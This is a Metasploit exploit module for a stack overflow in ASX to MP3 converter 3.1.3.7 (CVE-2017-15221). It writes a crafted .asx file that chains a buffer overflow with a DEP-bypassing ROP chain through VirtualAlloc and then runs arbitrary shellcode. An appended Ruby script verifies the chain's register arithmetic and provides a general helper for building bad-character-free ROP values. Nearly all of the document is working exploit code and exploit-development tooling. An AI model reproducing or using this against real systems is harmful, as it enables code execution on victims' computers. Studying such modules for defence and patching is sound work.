##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
      'Description'    => %q{
        This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
        By constructing a specially crafted ASX file and attempting to convert it to
        an MP3 file in the application, a buffer is overwritten, which allows for
        running shellcode.

        Tested on:
        Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
        Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Maxim Guslyaev', # EDB POC, Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2017-15221' ],
          [ 'EDB', '47468' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 Enterprise/10 Pro',
            {
              'Ret' => 0x1002D038 # RET
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x09\x0a"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Oct 06 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
      ])
  end

  def exploit
    buf = "http://"
    buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

    # DEP bypass: the ROP chain below stages the arguments of
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) in registers
    # and lets PUSHAD write them to the stack in call order:
    #   EDI = ROP NOP (RETN), ESI = &VirtualAlloc, EBP = return address
    #   (ADD ESP,8 # RETN), ESP = lpAddress, EBX = dwSize,
    #   EDX = flAllocationType (0x1000), ECX = flProtect (0x40).
    # Values that would contain a BadChar (\x00 \x09 \x0a) are never written to
    # the file directly; they are derived with ADC/INC/ADD arithmetic from
    # BadChar-free constants.

    ## Save allocation type (0x1000) in EDX
    buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
    buf += [0x11111111].pack("V")
    buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
    buf += [0x1002D493].pack("V") # POP EDX # RETN
    buf += [0xEEEEFEEF].pack("V")
    buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
    buf += [0x41414141].pack("V")

    ## Save the address of VirtualAlloc() in ESI
    buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
    buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
    buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
    buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
    buf += [0x41414141].pack("V")
    buf += [0x41414141].pack("V")

    ## Save the size of the block in EBX
    buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
    buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

    ## Save the address of (# ADD ESP,8 # RETN) in EBP
    buf += [0x10031c6c].pack("V") # POP EBP # RETN
    buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
    #buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

    ## Save memory protection code (0x40) in ECX
    buf += [0x1002ca22].pack("V") # POP ECX # RETN
    buf += [0xFFFFFFFF].pack("V")
    buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
    buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
    buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

    ## Save ROP-NOP in EDI
    buf += [0x1002e346].pack("V") # POP EDI # RETN
    buf += [0x1002D038].pack("V") # RETN

    ## Save NOPs in EAX
    #buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
    #buf += [0x90909090].pack("V") # nop

    ## Set up the EAX register to contain the address of # PUSHAD # RETN and JMP to this address
    buf += [0x1002E516].pack("V") # POP EAX # RETN
    buf += [0xA4E2F275].pack("V")
    buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
    buf += [0x10040ce5].pack("V") # PUSH EAX # RETN
    buf += "\x90" * 4
    buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
    buf += "\x90" * 20
    buf += payload.encoded

    file_create(buf)
  end
end
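The chain above never writes 0x1000, 0x40, 0x215 or its PUSHAD gadget address into the file; each is built from BadChar-free constants with ADC, INC and ADD gadgets, and the ADC only works because XOR EDX,EDX has cleared CF and POP/RETN do not touch it. The following script is an added example, not part of the Exploit-DB entry or the Metasploit module: it replays that register arithmetic to confirm what VirtualAlloc will receive, and shows how to derive a (POP value, ADD immediate) pair for any target dword whose encoding contains a bad byte. Function names (`badchar_free?`, `split_dword`, `chain_registers`) are this example's own; MEM_COMMIT = 0x1000 and PAGE_EXECUTE_READWRITE = 0x40 are the documented Windows constants; the 0x004050D4 that falls out of the module's POP EAX / ADD EAX,5B5D5E5F pair is only what the module's comment calls the address of its PUSHAD # RETN gadget, and its trailing 0x00 byte is what keeps it from being popped directly.

```ruby
# Added example (not the module's code): verify the BadChar-avoiding
# arithmetic in the ASX-to-MP3 ROP chain and derive such pairs in general.

BADCHARS = "\x00\x09\x0a".bytes.freeze   # the module's 'BadChars'
MASK = 0xFFFFFFFF

# True if the little-endian encoding of dword contains none of the bad bytes.
def badchar_free?(dword, badchars = BADCHARS)
  [dword & MASK].pack('V').bytes.none? { |b| badchars.include?(b) }
end

# Find (pop_value, addend) with (pop_value + addend) & MASK == target and both
# values BadChar-free. With fixed_addend set (the immediate of an available
# ADD reg,imm32 gadget, as with the module's ADD EAX,5B5D5E5F) only the POP
# value is solved; otherwise candidate addends are tried in a fixed order so
# the result is deterministic. Returns nil if no usable pair exists.
def split_dword(target, badchars = BADCHARS, fixed_addend: nil)
  target &= MASK
  addends = if fixed_addend
              [fixed_addend & MASK]
            else
              (1..0xFF).map { |b| b * 0x01010101 }   # 0x01010101, 0x02020202, ...
            end
  addends.each do |addend|
    pop = (target - addend) & MASK
    return [pop, addend] if badchar_free?(pop, badchars) && badchar_free?(addend, badchars)
  end
  nil
end

# Replay the module's gadget sequences and return the registers PUSHAD hands
# to VirtualAlloc. Only the arithmetic is modelled; RETN/POP padding that does
# not affect these registers is omitted.
def chain_registers
  esi = 0x11111111                       # popped by the first ADC EDX,ESI # POP ESI gadget
  cf  = 0                                # XOR EDX,EDX clears CF; POP EDX and RETN keep it
  edx = 0xEEEEFEEF                       # POP EDX
  edx = (edx + esi + cf) & MASK          # ADC EDX,ESI

  ecx = 0xFFFFFFFF                       # POP ECX
  2.times { ecx = (ecx + 1) & MASK }     # INC ECX x2  -> 0x00000001
  6.times { ecx = (ecx + ecx) & MASK }   # ADD ECX,ECX x6 (doubling = shift left 6)

  eax = 0                                # XOR EAX,EAX
  13.times { eax = (eax + 0x29) & MASK } # ADD EAX,29 x13
  ebx = eax                              # PUSH EAX ... POP EBX (before ADD AL,5D runs)

  eax = 0xA4E2F275                       # POP EAX
  eax = (eax + 0x5B5D5E5F) & MASK        # ADD EAX,5B5D5E5F -> PUSHAD # RETN address

  { edx: edx, ecx: ecx, ebx: ebx, eax: eax }
end

if __FILE__ == $PROGRAM_NAME
  regs = chain_registers
  printf("flAllocationType (EDX) = 0x%08X\n", regs[:edx])
  printf("flProtect        (ECX) = 0x%08X\n", regs[:ecx])
  printf("dwSize           (EBX) = 0x%08X\n", regs[:ebx])
  printf("PUSHAD gadget    (EAX) = 0x%08X  bad-char free? %s\n",
         regs[:eax], badchar_free?(regs[:eax]))
  pop, add = split_dword(regs[:eax], BADCHARS, fixed_addend: 0x5B5D5E5F)
  printf("POP 0x%08X ; ADD 0x%08X reproduces the module's pair\n", pop, add)
end
```

The same `split_dword` search applies to the other argument values: 0x1000 is what the module's POP EDX / ADC EDX,ESI pair (0xEEEEFEEF + 0x11111111) amounts to, and a target that cannot be split, because every candidate byte is bad, comes back as nil rather than as a chain that silently truncates in the file.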